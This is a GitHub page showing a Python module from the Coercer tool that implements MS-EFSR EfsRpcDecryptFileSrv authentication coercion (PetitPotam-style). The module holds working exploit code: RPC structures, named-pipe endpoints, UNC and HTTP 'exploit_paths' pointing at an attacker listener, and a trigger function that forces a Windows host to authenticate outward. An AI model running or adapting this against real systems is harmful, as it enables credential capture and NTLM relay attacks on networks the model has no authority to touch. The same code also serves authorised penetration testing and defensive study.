-
-
Notifications
You must be signed in to change notification settings - Fork 179
/
EfsRpcDecryptFileSrv.py
110 lines (96 loc) · 3.72 KB
/
EfsRpcDecryptFileSrv.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name : EfsRpcDecryptFileSrv.py
# Author : Podalirius (@podalirius_)
# Date created : 16 Sep 2022
from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
class _EfsRpcDecryptFileSrv(NDRCALL):
"""
Structure to make the RPC call to EfsRpcDecryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
"""
opnum = 5
structure = (
('FileName', WSTR), # Type: wchar_t *
('OpenFlag', ULONG), # Type: unsigned
)
class _EfsRpcDecryptFileSrvResponse(NDRCALL):
"""
Structure to parse the response of the RPC call to EfsRpcDecryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
"""
structure = ()
class EfsRpcDecryptFileSrv(MSPROTOCOLRPCCALL):
"""
Coercing a machine to authenticate using function EfsRpcDecryptFileSrv (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
Method found by:
- [@topotam77](https://twitter.com/topotam77)
"""
exploit_paths = [
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
]
access = {
"ncan_np": [
{
"namedpipe": r"\PIPE\efsrpc",
"uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
"version": "1.0"
},
{
"namedpipe": r"\PIPE\lsarpc",
"uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
"version": "1.0"
},
{
"namedpipe": r"\PIPE\samr",
"uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
"version": "1.0"
},
{
"namedpipe": r"\PIPE\lsass",
"uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
"version": "1.0"
},
{
"namedpipe": r"\PIPE\netlogon",
"uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
"version": "1.0"
},
],
"ncacn_ip_tcp": [
{
"uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
"version": "1.0"
},
{
"uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
"version": "1.0"
}
]
}
protocol = {
"longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
"shortname": "MS-EFSR"
}
function = {
"name": "EfsRpcDecryptFileSrv",
"opnum": 5,
"vulnerable_arguments": ["FileName"]
}
def trigger(self, dcerpc_session, target):
if dcerpc_session is not None:
try:
request = _EfsRpcDecryptFileSrv()
request['FileName'] = self.path
request['OpenFlag'] = 0
resp = dcerpc_session.request(request)
return ""
except Exception as err:
return err
else:
print("[!] Error: dce is None, you must call connect() first.")
return None